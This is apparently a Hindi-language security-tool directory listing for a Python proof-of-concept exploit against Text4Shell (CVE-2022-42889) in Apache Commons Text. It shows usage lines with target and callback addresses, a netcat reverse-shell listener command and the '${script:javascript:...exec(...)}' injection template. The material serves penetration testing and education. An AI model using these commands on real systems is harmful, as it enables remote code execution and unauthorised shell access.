Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
text4shell-exploit — Text4Shell (CVE-2022-42889) के लिए एक कस्टम Python-आधारित प्रूफ-ऑफ-कॉन्सेप्ट (PoC) एक्सप्लॉइट, जो Apache Commons Text संस्करण < 1.10 में एक महत्वपूर्ण रिमोट कोड निष्पादन भेद्यता को लक्षित करता है। | Kitploit
उपकरण/GitHubGitHub/syndicate27/text4shell-exploit
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubsyndicate27/text4shell-exploit

text4shell-exploit

Text4Shell (CVE-2022-42889) के लिए एक कस्टम Python-आधारित प्रूफ-ऑफ-कॉन्सेप्ट (PoC) एक्सप्लॉइट, जो Apache Commons Text संस्करण < 1.10 में एक महत्वपूर्ण रिमोट कोड निष्पादन भेद्यता को लक्षित करता है।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
रिपॉजिटरी देखें
111 साल पहलेअभी तक समीक्षित नहीं
साझा करें

text4shell-exploit

एक कस्टम Python-आधारित प्रूफ-ऑफ-कॉन्सेप्ट (PoC) एक्सप्लॉइट जो Text4Shell (CVE-2022-42889) को लक्षित करता है, जो Apache Commons Text संस्करणों < 1.10 में एक गंभीर रिमोट कोड एक्ज़ीक्यूशन भेद्यता है। यह एक्सप्लॉइट उन कमजोर Java अनुप्रयोगों को लक्षित करता है जो इंटरपोलेशन सक्षम के साथ StringSubstitutor क्लास का उपयोग करते हैं, जिससे मनमाने सिस्टम कमांड को निष्पादित करने के लिए ${script:...} एक्सप्रेशन इंजेक्ट किए जा सकते हैं।

इस PoC में, शोषण data क्वेरी पैरामीटर के माध्यम से प्रदर्शित किया गया है; हालांकि, कमजोर पैरामीटर का नाम कार्यान्वयन के आधार पर भिन्न हो सकता है। उपयोगकर्ताओं को लक्ष्य अनुप्रयोग के तर्क के अनुसार पेलोड और अनुरोध पथ को अनुकूलित करना चाहिए।

अस्वीकरण: यह एक्सप्लॉइट केवल शैक्षिक और अधिकृत पैनेट्रेशन परीक्षण उद्देश्यों के लिए प्रदान किया गया है। जिम्मेदारी से और अपने जोखिम पर उपयोग करें।

विवरण

यह Apache Commons Text भेद्यता के लिए एक कस्टम Python3 एक्सप्लॉइट है जिसे Text4Shell (CVE-2022-42889) के नाम से जाना जाता है। यह असुरक्षित इंटरपोलेटर्स के माध्यम से रिमोट कोड एक्ज़ीक्यूशन (RCE) की अनुमति देता है जब उपयोगकर्ता इनपुट को StringSubstitutor द्वारा गतिशील रूप से मूल्यांकित किया जाता है।

निम्नलिखित के विरुद्ध परीक्षण किया गया:

  • Apache Commons Text < 1.10.0
  • Java अनुप्रयोग जो अविश्वसनीय इनपुट से ${script:...} इंटरपोलेशन का उपयोग करते हैं

उपयोग

root@kitploit:~
python3 text4shell.py <target_ip> <callback_ip> <callback_port>

उदाहरण

root@kitploit:~
python3 text4shell.py 127.0.0.1 192.168.1.2 4444

अपनी हमला करने वाली मशीन पर एक lsitener सेट करना सुनिश्चित करें:

root@kitploit:~
nc -nlvp 4444

पेलोड लॉजिक

स्क्रिप्ट इंजेक्ट करती है:

root@kitploit:~
${script:javascript:java.lang.Runtime.getRuntime().exec(...)}

रिवर्स शेल /data पैरामीटर के माध्यम से POST अनुरोध का उपयोग करके भेजा जाता है।

टूल डाउनलोड करें